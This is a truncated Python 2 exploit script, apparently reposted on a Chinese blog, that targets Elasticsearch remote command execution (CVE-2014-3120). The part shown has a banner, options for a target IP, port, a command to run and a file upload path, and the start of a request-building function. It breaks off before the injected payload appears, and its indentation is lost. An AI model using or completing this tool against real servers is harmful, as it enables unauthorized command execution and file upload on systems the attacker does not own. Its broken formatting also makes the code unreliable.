#!/usr/bin/env python
# by heshang ha.cker@me.com
# -*- coding: utf-8 -*-
import httplib
import urllib,urllib2
import simplejson
import string
import sys
from optparse import OptionParser
print 'Elasticsearch ExpLoit By Heshang'
print ' 2014-06-23'
options = OptionParser(usage='%prog ip [port] [command]', description='elasticsearch command exec exploit(CVE-2014-3120)')
options.add_option('-p', '--port', type='int', default='9200',help='The elasticsearch port (default:9200)')
options.add_option('-c', '--cmd', type='str', default='whoami', help='command to test (default:whoami)')
options.add_option('-P', '--path',type='str', default='', help='Upload file\'s path')
def post(ip,port,exp):
ip=ip
port=port
path=''
exp=exp
data = {
"size": 1,
"query": {
"filtered": {
"query":
elasticsearch 漏洞利用工具套装
最新推荐文章于 2024-06-20 22:58:22 发布